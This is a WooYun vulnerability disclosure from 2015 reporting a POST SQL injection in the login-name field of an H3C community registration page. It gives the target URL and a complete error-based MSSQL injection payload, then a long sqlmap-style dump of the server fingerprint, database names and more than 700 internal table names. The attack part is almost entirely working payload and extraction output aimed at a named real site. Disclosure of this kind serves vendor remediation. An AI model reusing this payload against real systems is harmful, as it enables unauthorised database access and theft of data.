华三某系统存在POST注入问题 | wooyun-2015-096781| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-096781

漏洞标题：华三某系统存在POST注入问题

漏洞作者：路人甲

提交时间：2015-02-14 10:12

修复时间：2015-03-31 10:14

公开时间：2015-03-31 10:14

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-02-14：细节已通知厂商并且等待厂商处理中
2015-02-15：厂商已经确认，细节仅向厂商公开
2015-02-25：细节向核心白帽子及相关领域专家公开
2015-03-07：细节向普通白帽子公开
2015-03-17：细节向实习白帽子公开
2015-03-31：细节向公众公开
简要描述：

呃...应该没重复吧?
详细说明：

http://h3community.h3c.com:80/Member/RegistrationPage.aspx
注册页面 txtLoginName存在POST注入
漏洞证明：

Parameter: txtLoginName (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwULLTE1MDQyNjUwMTcPZBYCAgMPZBYgAgMPZBYCAh8PDxYCHgdWaXNpYmxlZ2RkAgcPDxYCHgxFcnJvck1lc3NhZ2UFHENvbXBhbnkgTmFtZSBNaXNzaW5nICBJbnB1dCFkZAILDw8WAh8BBRROYW1lIE1pc3NpbmcgIElucHV0IWRkAg8PDxYCHwEFFVRpdGxlIE1pc3NpbmcgIElucHV0IWRkAhMPDxYCHwEFGVRlbGVwaG9uZSBNaXNzaW5nICBJbnB1dCFkZAIXDw8WAh8BBRxNb2JpbGUgUGhvbmUgTWlzc2luZyAgSW5wdXQhZGQCGw8PFgIfAQUbQ28uIGFkZHJlc3MgTWlzc2luZyAgSW5wdXQhZGQCHw8PFgIfAQUTRmF4IE1pc3NpbmcgIElucHV0IWRkAiMPDxYCHwEFFUVtYWlsIE1pc3NpbmcgIElucHV0IWRkAiQPDxYCHwEFDEVtYWlsIFdyb25nIWRkAigPDxYCHwEFGkxvZ2luIE5hbWUgTWlzc2luZyAgSW5wdXQhZGQCKg8PFgIfAQUiTWluaW11bSA2IEFscGhhbnVtZXJpYyBDaGFyYWN0ZXJzIWRkAiwPDxYCHgdFbmFibGVkaGRkAi4PDxYCHgRUZXh0ZWRkAjAPDxYCHwJnZGQCMg8WAh4IZGlzYWJsZWQFCGRpc2FibGVkZGQxn310x8n+6Yu92XB+lZvtoDt4uw==&txtCompany=KHfj&txtName=&txtTitle=bHNY&txtTelephone=&txtMobilePhone=kIww&txtAddress=&txtFax=SLrR&txtEmail=&txtLoginName=SFCg' AND 4133=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4133=4133) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(122)+CHAR(112)+CHAR(113))) AND 'TxaM'='TxaM&btAgree=Agree&__EVENTVALIDATION=/wEWDALcjoebCgKXv9ziDwLEhISFCwL55JyzBAK287TlCgLm4ZKMBALv7ITZAgKH+/LHDgKE8/26DAKpwK/OBgLm+tPhCwLoqK/YB3GaXn478AtSlYagT+j7eMS84oUv
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
current user is DBA:    False
available databases [9]:
[*] CMS2007_Admin_DB
[*] CMS2007_Portal_DB
[*] CMS2007_Portal_DB_CN
[*] COPYTS
[*] distribution
[*] master
[*] model
[*] msdb
[*] tempdb
Database: CMS2007_Admin_DB
[724 tables]
+--------------------------------------------------+
| ADDRESS                                          |
| AGENT_JOB                                        |
| AGENT_JOBTYPE                                    |
| AGENT_LOG                                        |
| AGENT_SCHE                                       |
| AP_AUTH_AccreditRejectReason                     |
| AP_AUTH_Agent1Company                            |
| AP_AUTH_AgentApplyRecord                         |
| AP_AUTH_AgentApplyRecordVW                       |
| AP_AUTH_AgentCertPrint_VW                        |
| AP_AUTH_AgentCertificate                         |
| AP_AUTH_AgentUpgradeApproveHistory               |
| AP_AUTH_AgentUpgradeEstimate                     |
| AP_AUTH_ApplyProductLine                         |
| AP_AUTH_ApplyProductLine140423                   |
| AP_AUTH_ApplyProductLine20100507                 |
| AP_AUTH_ApplyProductLine20120317                 |
| AP_AUTH_ApplyProductLineIndustryVW               |
| AP_AUTH_ApplyProductLineVW                       |
| AP_AUTH_AreaAndAuthor                            |
| AP_AUTH_AreaAndAuthorVW                          |
| AP_AUTH_AttentionProductLine                     |
| AP_AUTH_Auth                                     |
| AP_AUTH_Auth140423                               |
| AP_AUTH_Auth20120317                             |
| AP_AUTH_AuthAgentLevelQueryExportExcelVW         |
| AP_AUTH_AuthHistory                              |
| AP_AUTH_AuthIndustryVW                           |
| AP_AUTH_AuthQueryExportExcelVW                   |
| AP_AUTH_BaseInfo                                 |
| AP_AUTH_BaseInfo20131218                         |
| AP_AUTH_BaseInfoHistory                          |
| AP_AUTH_BaseInfoQueryVW                          |
| AP_AUTH_BaseInfo_20111021                        |
| AP_AUTH_BaseInfo_20140507                        |
| AP_AUTH_CertificateDatum                         |
| AP_AUTH_ComanyGroupVW                            |
| AP_AUTH_CommunicateTable                         |
| AP_AUTH_CooperatePlan                            |
| AP_AUTH_CoverSaleArea                            |
| AP_AUTH_CoverSaleProvinceVW                      |
| AP_AUTH_DDQDataInfo                              |
| AP_AUTH_DDQDataInfo20140314                      |
| AP_AUTH_EngineerCertificate                      |
| AP_AUTH_EngineerCertificateVW                    |
| AP_AUTH_ExportExcelProductLineAllVW              |
| AP_AUTH_FilesRejectAndProductLine                |
| AP_AUTH_FilesRejectReason                        |
| AP_AUTH_Industry                                 |
| AP_AUTH_InteCoverIndustryVW                      |
| AP_AUTH_IntegrationCoverIndustry                 |
| AP_AUTH_IntegrationProject                       |
| AP_AUTH_IntegrationStrength                      |
| AP_AUTH_MostlyProduct                            |
| AP_AUTH_MostlyProductVW                          |
| AP_AUTH_OnlineSurvey                             |
| AP_AUTH_PartnerQueryForScore                     |
| AP_AUTH_PartnerQueryVW                           |
| AP_AUTH_PostSaleEngineer_Test                    |
| AP_AUTH_ProductContact                           |
| AP_AUTH_ProductContact_backUp                    |
| AP_AUTH_ProductLineArea                          |
| AP_AUTH_Protocols                                |
| AP_AUTH_Sale                                     |
| AP_AUTH_SaleOA                                   |
| AP_AUTH_SalesFiliation                           |
| AP_AUTH_SalesNet                                 |
| AP_AUTH_SeperateSaleAbility                      |
| AP_AUTH_SignProtocolVW                           |
| AP_AUTH_TempAccount                              |
| AP_AUTH_ThreeYearSales                           |
| AP_AppAdapter                                    |
| AP_CDIP_AGENTCODE                                |
| AP_CDIP_AGENTLEVEL                               |
| AP_CD_AgentCertificate                           |
| AP_CD_Area                                       |
| AP_CD_AuthStatus                                 |
| AP_CD_AuthStatus_BackUp                          |
| AP_CD_AuthType                                   |
| AP_CD_BULeaderEMailsVW                           |
| AP_CD_CertClassify                               |
| AP_CD_CertProperty                               |
| AP_CD_CertificateType                            |
| AP_CD_City                                       |
| AP_CD_CompanyType                                |
| AP_CD_EFlowType                                  |
| AP_CD_EVENTTYPE                                  |
| AP_CD_EcosystemType                              |
| AP_CD_EduCertType                                |
| AP_CD_GroupRights                                |
| AP_CD_Industry                                   |
| AP_CD_Industry2                                  |
| AP_CD_Industry3                                  |
| AP_CD_IntegrationIdentity                        |
| AP_CD_MainWork                                   |
| AP_CD_Office                                     |
| AP_CD_Oppstyle                                   |
| AP_CD_Product                                    |
| AP_CD_ProductLevel                               |
| AP_CD_ProductLevel_Group                         |
| AP_CD_ProductLine                                |
| AP_CD_ProductLineStatus                          |
| AP_CD_ProviceAndOffice                           |
| AP_CD_ProviceAndOfficeVW                         |
| AP_CD_Province                                   |
| AP_CD_ProvinceAndOACity                          |
| AP_CD_ProvinceVW                                 |
| AP_CD_SaleProvince                               |
| AP_CD_ServiceLevel                               |
| AP_CD_ServiceProductLine                         |
| AP_CD_Standard                                   |
| AP_CD_TrainCenterType                            |
| AP_CD_UserAndOffice                              |
| AP_CD_User_ProductLine                           |
| AP_CHANNEL_BALEFUL_ARREARAGE                     |
| AP_CHANNEL_BEAR_PALM                             |
| AP_CHANNEL_BRIEF_LIST                            |
| AP_CHANNEL_BRIEF_LIST_History                    |
| AP_CHANNEL_CreditEvalRelsult                     |
| AP_CHANNEL_ET_APPLY_PAY_SCHEDU                   |
| AP_CHANNEL_ET_INDUSTRY_PLAN                      |
| AP_CHANNEL_ET_OTHERINFO                          |
| AP_CHANNEL_ET_SALES_PROMOTION                    |
| AP_CHANNEL_OTHER_KEY_INFO                        |
| AP_CHANNEL_OUT_OF_LINE                           |
| AP_CHANNEL_QUARTER_CALCULATE                     |
| AP_CHANNEL_QUARTER_RETURN_POIN                   |
| AP_CHANNEL_TBSOAGENT1WEEK                        |
| AP_CHANNEL_TBSOHODETAIL                          |
| AP_CHANNEL_TBSOHOPROJECTCONTRA                   |
| AP_CMS_Rights                                    |
| AP_CPMS_AuthVW                                   |
| AP_CPMS_BaseInfoVW                               |
| AP_CPMS_CertifiedWinner                          |
| AP_CPMS_CertifiedWinnerDetail                    |
| AP_CPMS_ProductContactDiffDataVW                 |
| AP_CPMS_ProductContactVW                         |
| AP_CPMS_TSAgentVW                                |
| AP_Channel_Black_List                            |
| AP_Channel_Black_List_History                    |
| AP_EDU_800CallBack                               |
| AP_EDU_CertAndScore                              |
| AP_EDU_CertStar                                  |
| AP_EDU_Certificate                               |
| AP_EDU_Certificate20141216                       |
| AP_EDU_CertificateSetting                        |
| AP_EDU_CertificateStarVW                         |
| AP_EDU_CertificateVW                             |
| AP_EDU_CnStuResume                               |
| AP_EDU_Cntester                                  |
| AP_EDU_CntesterStarVW                            |
| AP_EDU_Cntester_100810_verify                    |
| AP_EDU_Cntester_bak_20100818                     |
| AP_EDU_Cntester_temp20100818                     |
| AP_EDU_CombinDetail                              |
| AP_EDU_Course                                    |
| AP_EDU_CourseAndCourseDetailRelation             |
| AP_EDU_CourseCombineWay                          |
| AP_EDU_CourseDetail                              |
| AP_EDU_Dictionary                                |
| AP_EDU_Exam                                      |
| AP_EDU_ExamBooking                               |
| AP_EDU_ExportExcelTesterCertificateVW            |
| AP_EDU_H3CE_BookOnlineLectures                   |
| AP_EDU_H3CE_CDCode                               |
| AP_EDU_H3CE_Certificate                          |
| AP_EDU_H3CE_Certificate11_3                      |
| AP_EDU_H3CE_Cntester                             |
| AP_EDU_H3CE_OnlineLectures                       |
| AP_EDU_H3CE_Score                                |
| AP_EDU_HCNAData                                  |
| AP_EDU_HWSEQ                                     |
| AP_EDU_JobsCompanyInfo                           |
| AP_EDU_JobsInfo                                  |
| AP_EDU_JobsNewInfo                               |
| AP_EDU_JobsPostInfo                              |
| AP_EDU_Lesson                                    |
| AP_EDU_LessonInfo                                |
| AP_EDU_Lesson_2013_6_7                           |
| AP_EDU_Lesson_2013_6_7_bak                       |
| AP_EDU_NewCertStarVW                             |
| AP_EDU_Project                                   |
| AP_EDU_Project_DepenDon                          |
| AP_EDU_QU_ItemSelection                          |
| AP_EDU_QU_Paper                                  |
| AP_EDU_QU_PaperQuestion                          |
| AP_EDU_QU_Question                               |
| AP_EDU_QU_QuestionItem                           |
| AP_EDU_QU_Response                               |
| AP_EDU_QU_ResponsePaper                          |
| AP_EDU_ResumeInfo                                |
| AP_EDU_SatisfactionVW                            |
| AP_EDU_SignUp                                    |
| AP_EDU_Student                                   |
| AP_EDU_StudentInLesson                           |
| AP_EDU_StudentInLesson_2013_6_7                  |
| AP_EDU_StudentInLesson_2013_6_7_bak              |
| AP_EDU_Teach_Aptitudes                           |
| AP_EDU_Teach_Auth                                |
| AP_EDU_Teach_Practice                            |
| AP_EDU_Teach_Reward                              |
| AP_EDU_Teach_Teach                               |
| AP_EDU_Teach_Test                                |
| AP_EDU_Teach_Train                               |
| AP_EDU_Teach_Train2                              |
| AP_EDU_Teach_Work                                |
| AP_EDU_Teach_ZZ                                  |
| AP_EDU_Teacher                                   |
| AP_EDU_TeacherExamScore                          |
| AP_EDU_TesterExamScore                           |
| AP_EDU_Tqd_Mark                                  |
| AP_EDU_TrainBooking                              |
| AP_EDU_TrainCenter                               |
| AP_EDU_TrainManInfo                              |
| AP_EDU_TrainNeed                                 |
| AP_EDU_TrainStudentsNetVW                        |
| AP_EDU_TrainStudentsVW                           |
| AP_EDU_TrainingCenterProject                     |
| AP_EDU_TrainingCenter_NianFei                    |
| AP_EDU_TrainingCenter_SheBei                     |
| AP_EDU_TrainingCenter_ShiZi                      |
| AP_EDU_TrainingCenter_ZhangHu                    |
| AP_EDU_TrainingProject                           |
| AP_EDU_TrainingProjectLimited                    |
| AP_EDU_TrainingSatisfaction                      |
| AP_EDU_TrainingSatisfaction20100318              |
| AP_EDU_WebMatch_Court                            |
| AP_EDU_WebMatch_Info                             |
| AP_EDU_WebMatch_RegInfo                          |
| AP_EDU_WebMatch_Student                          |
| AP_EDU_WebMatch_Student20140305                  |
| AP_EDU_WebMatch_User                             |
| AP_EXPERT_QuestionAndAnswer                      |
| AP_EXPERT_QuestionAndAnswerVW                    |
| AP_EXPERT_Theme                                  |
| AP_EXP_AtachFile                                 |
| AP_EXP_HistoryInfo                               |
| AP_EXP_ProjBasicInfo                             |
| AP_GENERAL_DOCUMENT                              |
| AP_NOTES_BaseInfoVW                              |
| AP_OperatorLog                                   |
| AP_PagePart                                      |
| AP_PagePartProperty                              |
| AP_QK_Magazine                                   |
| AP_QK_Subscribe                                  |
| AP_QK_User                                       |
| AP_SUN_ACEvaluationInfo                          |
| AP_SUN_ACPSInfo                                  |
| AP_SUN_ACPayApplyInfo                            |
| AP_SUN_ACReaApplyInfo                            |
| AP_SUN_ADPayApplyInfo                            |
| AP_SUN_ADReqApplyInfo                            |
| AP_SUN_AcadAcount                                |
| AP_SUN_AcountInfo                                |
| AP_SUN_AttachInfo                                |
| AP_SUN_BasicInfo                                 |
| AP_SUN_BedgetInfo                                |
| AP_SUN_FlowInfo                                  |
| AP_SUN_MagDetialInfo                             |
| AP_SUN_MailTargetInfo                            |
| AP_TS_AgentEngineer                              |
| AP_TS_AgentEngineerAccount                       |
| AP_TS_AgentEngineerAccountVW                     |
| AP_TS_AgentEngineerAccountVW1                    |
| AP_TS_AgentEngineerCertifacate                   |
| AP_TS_AgentEngineerCertifacateVW                 |
| AP_TS_AgentEngineer_temp                         |
| AP_TS_AgentManager                               |
| AP_TS_ApplyBaseInfo                              |
| AP_TS_ApplyBaseInfoBefore                        |
| AP_TS_ApplyBaseInfoBeforeVW                      |
| AP_TS_ApplyBaseInfoHistory                       |
| AP_TS_ApplyService                               |
| AP_TS_ApplyServiceDatum                          |
| AP_TS_ApplyServiceHistory                        |
| AP_TS_ApplyService_temp                          |
| AP_TS_Engineer                                   |
| AP_TS_Engineer20130504                           |
| AP_TS_LAB                                        |
| AP_TS_SMBdata                                    |
| AP_TS_ServiceCommissionInfo                      |
| AP_TS_ServiceManageInfo                          |
| AP_TS_ServiceManageInfo2013514                   |
| AP_TS_StarStand                                  |
| AP_TS_TEST                                       |
| AP_TS_TESTEVENT                                  |
| AP_TS_TESTKEYEVENT                               |
| AP_TS_TESTVW                                     |
| AP_TS_serviceLab                                 |
| AP_TS_serviceLab_temp                            |
| AgentFreezing                                    |
| AllDealerBaseInfoVW                              |
| AllProductLineVW                                 |
| ApplyUserRightVW                                 |
| BD_ChannelInfo                                   |
| BD_DelDocumentInfo                               |
| BD_DocCenter                                     |
| BD_DocumentInfo                                  |
| CMSLog                                           |
| CMSLog4Email                                     |
| CMS_APPCONF                                      |
| CMS_CHANNELS                                     |
| CMS_CHANNELS_20131018                            |
| CMS_CH_TPL                                       |
| CMS_CONSTANTS                                    |
| CMS_Channels_Recycle                             |
| CMS_DATASOURCES                                  |
| CMS_DATASRC_MAP                                  |
| CMS_DEP                                          |
| CMS_DISTCONF                                     |
| CMS_DISTSCHE                                     |
| CMS_DIST_LANGUAGE                                |
| CMS_DOCFIELD                                     |
| CMS_DOCFILETYPE                                  |
| CMS_DOCFILTER_KEYWORDS                           |
| CMS_DOCFILTER_KEYWORDSCATS                       |
| CMS_DOCMAIN                                      |
| CMS_DOCMAIN_History                              |
| CMS_DOCMAIN_Old                                  |
| CMS_DOCTEXT                                      |
| CMS_DOCTEXT_BackUp_DeleteData                    |
| CMS_DOCTEXT_History                              |
| CMS_DOCTYPE_INFOTAG                              |
| CMS_DOCTYPE_RULE                                 |
| CMS_DOC_ACC                                      |
| CMS_DOC_ACC_BackUp_DeleteData                    |
| CMS_DOC_CH                                       |
| CMS_DOC_INFOTAG                                  |
| CMS_DOC_KEYWORDS                                 |
| CMS_DOC_RELATDOC                                 |
| CMS_Doc_Atr                                      |
| CMS_Docmain_Recycle                              |
| CMS_FD_CH                                        |
| CMS_FD_CH_20131018                               |
| CMS_FD_SRC                                       |
| CMS_FOLDERS                                      |
| CMS_FOLDERS_20131018                             |
| CMS_Function                                     |
| CMS_GROUPS                                       |
| CMS_GROUP_CH                                     |
| CMS_GROUP_FD                                     |
| CMS_GROUP_USER                                   |
| CMS_Group                                        |
| CMS_GroupRole                                    |
| CMS_INFOTAG                                      |
| CMS_KEYWORDCATS                                  |
| CMS_KEYWORDS                                     |
| CMS_PLACEHOLDER                                  |
| CMS_RESFILE                                      |
| CMS_RESFOLD                                      |
| CMS_ROLE_RIGHTS                                  |
| CMS_RelationShip                                 |
| CMS_Resource                                     |
| CMS_ResourceType                                 |
| CMS_Right                                        |
| CMS_Role                                         |
| CMS_RoleFunction                                 |
| CMS_SPEC_DOCS                                    |
| CMS_STATUS_ACTION                                |
| CMS_SVRCONF                                      |
| CMS_TEMPLATES                                    |
| CMS_TEMPLATES_20141112                           |
| CMS_TEMPLATES_20141201                           |
| CMS_TPL_CH_Relations                             |
| CMS_TPL_DEPEND                                   |
| CMS_TPL_DEPEND_20131018                          |
| CMS_TPL_INDEX                                    |
| CMS_TPL_ReTPL_Relations                          |
| CMS_TagCache                                     |
| CMS_USERS                                        |
| CMS_User                                         |
| CMS_UserGroup                                    |
| Cms_Fd_Relation                                  |
| Cms_Keyword                                      |
| Cms_KeywordCategory                              |
| Cms_sharedoc_Relation                            |
| CompanyAdminVW                                   |
| CompanyMemberCanApplyGroupVW                     |
| DB_UPDATE                                        |
| DEPARTMENT                                       |
| DailyReport                                      |
| EP_Document                                      |
| EP_Member                                        |
| EP_PointRecord                                   |
| EP_Prize                                         |
| EP_PrizeRedemption                               |
| EP_Product                                       |
| EP_ProductAndCategory                            |
| EP_ProductCategory                               |
| EP_Project                                       |
| EP_ProjectDetail                                 |
| Hotword                                          |
| MSpeer_lsns                                      |
| MSpeer_request                                   |
| MSpeer_response                                  |
| MSpub_identity_range                             |
| NT_Agent                                         |
| NT_EmailInfo                                     |
| NT_Log                                           |
| NT_NewProduct_Auth_Items                         |
| NT_NewProduct_TrainAndAuth_Booking_Auths         |
| NT_NewProduct_TrainAndAuth_Booking_Auths0709     |
| NT_NewProduct_TrainAndAuth_Booking_Members       |
| NT_NewProduct_TrainAndAuth_Booking_Trains        |
| NT_NewProduct_TrainAndAuth_ClassPlan             |
| NT_NewProduct_TrainAndAuth_ClassPlan2            |
| NT_NewProduct_TrainAndAuth_Contract              |
| NT_NewProduct_Train_Items                        |
| NT_Province                                      |
| NT_YQH                                           |
| NeedDistChannelsList                             |
| Portal_Group_Res                                 |
| Portal_Groups                                    |
| Portal_ResourceUrl                               |
| Portal_User_Group                                |
| Portal_Users                                     |
| ProxyAccout                                      |
| PublishFiles                                     |
| Report_UpdatedTemplates                          |
| SITE_MENUCF                                      |
| ScoreFdPath                                      |
| Sheet11$                                         |
| Sheet12$                                         |
| SiteLog                                          |
| TempCatalogVW                                    |
| TempFreezeVW                                     |
| TempFreezeVW625                                  |
| Temp_AP_CPMS_CertifiedWinner                     |
| Training_Department_List                         |
| TypeLog                                          |
| UpdateDataTable                                  |
| UpdateOACity                                     |
| VNT_NewProduct_TrainAndAuth_AgentLevel           |
| VNT_NewProduct_TrainAndAuth_Booking_AuthMembers  |
| VNT_NewProduct_TrainAndAuth_Booking_TrainMembers |
| View_AP_CPMS_CertifiedWinner                     |
| agentTable                                       |
| ap_auth_protocols20100623                        |
| backup_tbqueueemail                              |
| cdFAQSubType                                     |
| chem_infotypes                                   |
| chem_maillog                                     |
| cms_DelFolderAndDocLate                          |
| cms_RelationShip_20131018                        |
| cms_ch_tpl_tmp                                   |
| cms_doc_audit                                    |
| cms_docrp_rs                                     |
| cms_siteconf                                     |
| cms_tpl_depend_tmp                               |
| cms_user201418                                   |
| con_group_user                                   |
| con_groups                                       |
| con_res_auth                                     |
| con_roles                                        |
| con_users                                        |
| dongjie                                          |
| dtproperties                                     |
| fk                                               |
| h3cCareClubServiceManage                         |
| ketmp_template_20141222_01                       |
| ktemp_cms_folders20150115_01                     |
| ktemp_template_20141202_01                       |
| ktemp_template_20141203_01                       |
| ktemp_template_20141203_02                       |
| ktemp_template_20141211_01                       |
| ktemp_template_20141211_02                       |
| ktemp_template_20141219_01                       |
| ktemp_template_20141222_02                       |
| ktemp_template_20141222_03                       |
| ktemp_template_20141222_04                       |
| ktemp_template_20141222_05                       |
| ktemp_template_20141223_01                       |
| ktemp_template_20141223_02                       |
| ktemp_template_20141224_01                       |
| ktemp_template_20141224_02                       |
| ktemp_template_20141224_03                       |
| ktemp_template_20141225_01                       |
| ktemp_template_20141225_02                       |
| ktemp_template_20141229_01                       |
| ktemp_template_20150107_01                       |
| ktemp_templates20150205_01                       |
| ktemp_templates20150205_02                       |
| ktemp_templates20150205_03                       |
| ktemp_templates20150205_04                       |
| ktemp_templates20150206_01                       |
| ktemp_templates20150206_02                       |
| ktemp_templates20150206_03                       |
| ktemp_templates20150206_04                       |
| ktemp_templates20150206_05                       |
| ktemp_templates20150206_06                       |
| ktemp_templates20150206_07                       |
| ktemp_templates20150206_08                       |
| ktemp_templates20150206_09                       |
| ktemp_templates20150206_10                       |
| ktemp_templates20150206_11                       |
| ktemp_templates20150206_12                       |
| ktemp_templates20150206_13                       |
| ktemp_templates20150206_14                       |
| ktemp_templates20150209_01                       |
| ktemp_templates_20150109_01                      |
| mail_address                                     |
| mail_mailfolder                                  |
| mail_parameter                                   |
| poll_Option                                      |
| poll_Question                                    |
| poll_Topic                                       |
| poll_Vote                                        |
| poll_Vote_Answer                                 |
| servicenotpasstemp                               |
| servicenotpasstemp1                              |
| servicepasstemp                                  |
| servicepasstemp1                                 |
| struct_mutile_default                            |
| struct_single_default                            |
| syncobj_0x3131344533424539                       |
| syncobj_0x3133443032323639                       |
| syncobj_0x3142334345433135                       |
| syncobj_0x3145393834423546                       |
| syncobj_0x3145453746334534                       |
| syncobj_0x3232333946453139                       |
| syncobj_0x3239433442453230                       |
| syncobj_0x3333443236343530                       |
| syncobj_0x3335393231394545                       |
| syncobj_0x3346433037413030                       |
| syncobj_0x3346443733383341                       |
| syncobj_0x3431343343344436                       |
| syncobj_0x3433384633303334                       |
| syncobj_0x3531363543394541                       |
| syncobj_0x3531364634303942                       |
| syncobj_0x3541303537354342                       |
| syncobj_0x3545384230333232                       |
| syncobj_0x3638393734313132                       |
| syncobj_0x3733334632424432                       |
| syncobj_0x3734413132354544                       |
| syncobj_0x3838384339333534                       |
| syncobj_0x3843393045434632                       |
| syncobj_0x3932303436443831                       |
| syncobj_0x3934443744373332                       |
| syncobj_0x3936433731414644                       |
| syncobj_0x3937334639303335                       |
| syncobj_0x3941413742393732                       |
| syncobj_0x4132443342384639                       |
| syncobj_0x4142453538324243                       |
| syncobj_0x4144444137364446                       |
| syncobj_0x4146454145413642                       |
| syncobj_0x4235444331443530                       |
| syncobj_0x4237443534393037                       |
| syncobj_0x4238383338413344                       |
| syncobj_0x4239313730344334                       |
| syncobj_0x4246393846383936                       |
| syncobj_0x4246453336463342                       |
| syncobj_0x4344454144383532                       |
| syncobj_0x4345373330433237                       |
| syncobj_0x4345394335464546                       |
| syncobj_0x4434384631354430                       |
| syncobj_0x4434443038363145                       |
| syncobj_0x4442333034303746                       |
| syncobj_0x4443464235373034                       |
| syncobj_0x4541324433434438                       |
| syncobj_0x4541383133314139                       |
| syncobj_0x4542303334334237                       |
| syncobj_0x4641383538363035                       |
| syncobj_0x4641394537443645                       |
| syncobj_0x4641463337413631                       |
| sysarticlecolumns                                |
| sysarticles                                      |
| sysarticleupdates                                |
| sysdiagrams                                      |
| sysextendedarticlesview                          |
| syspublications                                  |
| sysreplservers                                   |
| sysschemaarticles                                |
| syssubscriptions                                 |
| systranschemas                                   |
| tbAppAuthorizationBase                           |
| tbAppAuthorizationWithGroup                      |
| tbAppProductBase                                 |
| tbArticleScore                                   |
| tbAutherChannel                                  |
| tbBaseInfoAddressTemp                            |
| tbBaseInfoContactorTemp                          |
| tbBroadDoc                                       |
| tbBroadGroup                                     |
| tbBroadUser                                      |
| tbBroadUserInterest                              |
| tbBusinessTypeBase                               |
| tbChannelFlowInfo                                |
| tbChannelFlowInfoVW                              |
| tbCompany                                        |
| tbContactList                                    |
| tbContactTypeBase                                |
| tbContinentAndCountryBase                        |
| tbCountryArea                                    |
| tbCountryForPartnerApp                           |
| tbDelContactorTemp                               |
| tbDocLinkReportTotal                             |
| tbDynamicPage                                    |
| tbEventVisitor                                   |
| tbEventWithVisitor                               |
| tbFAQ                                            |
| tbFAQTypeBase                                    |
| tbFolder                                         |
| tbFolderIDWithSaveRootPath                       |
| tbGroupUpgradeRule                               |
| tbHaveAuthorGroup                                |
| tbHideChannel                                    |
| tbHotKeywords                                    |
| tbIVSApplyInfo                                   |
| tbIVSAuditInfo                                   |
| tbIndustryBase                                   |
| tbIntelApplyInfo                                 |
| tbKeyNetworkingBase                              |
| tbMailList                                       |
| tbMajorProject                                   |
| tbMarketActivites                                |
| tbMarketScore                                    |
| tbMarketScore_1                                  |
| tbMessageGroup                                   |
| tbMessageUser                                    |
| tbMessageUserWithGroup                           |
| tbMessageUser_20120424                           |
| tbMobile_DocmainComments                         |
| tbMobile_FileFolder                              |
| tbMobile_PortalUserFeedbacks                     |
| tbMobile_PortalUserScores                        |
| tbMobile_ProductCategory                         |
| tbMobile_ProductSeries                           |
| tbMobile_ProductVersion                          |
| tbMobile_Products                                |
| tbMobile_TopicFolder                             |
| tbMyH3C                                          |
| tbMyH3C_Group                                    |
| tbMyH3C_Type                                     |
| tbOAAPartnerInfo                                 |
| tbPortalApproveApplication                       |
| tbPortalChannelRights                            |
| tbPortalFunctionLog                              |
| tbPortalGroupApproveLevel                        |
| tbPortalGroupCommonUser                          |
| tbPortalGroupCommonUser_2013_05_13               |
| tbPortalGroupEmployee                            |
| tbPortalGroupEmployee_2013_05_13                 |
| tbPortalGroupStudent                             |
| tbPortalGroupStudent_2013_05_13                  |
| tbPortalGroupUser                                |
| tbPortalGroupUser_2013_05_13                     |
| tbPortalGroups                                   |
| tbPortalGroupsResource                           |
| tbPortalLog                                      |
| tbPortalResRights                                |
| tbPortalTraceLog                                 |
| tbPortalUsers                                    |
| tbPortalUsers20121026                            |
| tbPortalUsersAndMobile                           |
| tbPortalUsersAttribute                           |
| tbPortalUsers_20111021                           |
| tbPortalUsers_2013_05_13                         |
| tbProductBase                                    |
| tbProductContactorTemp                           |
| tbPublishSite                                    |
| tbQueueEmail                                     |
| tbQueueEmailAccessories                          |
| tbQueueEmailAccessoriesHistory                   |
| tbQueueEmailHistory                              |
| tbQueueTask                                      |
| tbQueueTaskHistory                               |
| tbSSO_AdminTask                                  |
| tbSSO_CPPS_Agency                                |
| tbSSO_CPPS_Agency1                               |
| tbSSO_Employee                                   |
| tbSSO_FieldMap                                   |
| tbSSO_KMS_Proviences_Cities                      |
| tbSSO_Log                                        |
| tbSSO_LogoutUrl                                  |
| tbSSO_Queue                                      |
| tbSSO_QueueHistory                               |
| tbSSO_SPMS_Proviences_Cities                     |
| tbSSO_ShareSession                               |
| tbSSO_UserMap                                    |
| tbScore                                          |
| tbSiteChannels                                   |
| tbSwitchProduct                                  |
| tbTimeZoneBase                                   |
| tbUploadBatch                                    |
| tbUploadBatchNew                                 |
| tbUserInfTemp                                    |
| tbUserValidate                                   |
| tbUserWithCompany                                |
| tbUserWithEventVisitor                           |
| tbVedioFile                                      |
| tbVedioFileNew                                   |
| tbVedioSaveRootPath                              |
| tb_UserLoginLog                                  |
| tbportalResource                                 |
| tbportalgroupuser20110517                        |
| tbsso_ClientSite                                 |
| tempAP_AUTH_ApplyProductLine5_22                 |
| tempAP_AUTH_Auth5_22                             |
| tempAP_AUTH_BaseInfo5_22                         |
| temp_AP_CPMS_CertifiedWinnerDetail               |
| temp_acc_url                                     |
| temp_agentuser                                   |
| temp_aspxstatistic                               |
| temp_aspxstatistic1                              |
| temp_backup_templates                            |
| temp_doctext140331                               |
| vFolderPower                                     |
| viewPortalUsersResource                          |
| vwGetAproveDocCh                                 |
| vw_EduInface_Certificate                         |
| vw_EduInface_ExamScore                           |
| vw_EventVisitorByEventID                         |
| vw_EventWithUsers                                |
| vw_GetFullVedioInfo                              |
| vw_GetFullVedioInfoNew                           |
| vw_GetMessageUserFullInfo                        |
| vw_GetVisitorDetail                              |
| vw_GroupUpgradeRaletionShip                      |
| vw_PartnerAppInfo                                |
| vw_showUsersAndGroups                            |
| vwp_content                                      |
| wp_channels                                      |
| wp_content                                       |
| yxyVerify                                        |
+--------------------------------------------------+
修复方案：

过滤
版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中
漏洞Rank：7
确认时间：2015-02-15 14:33
厂商回复：

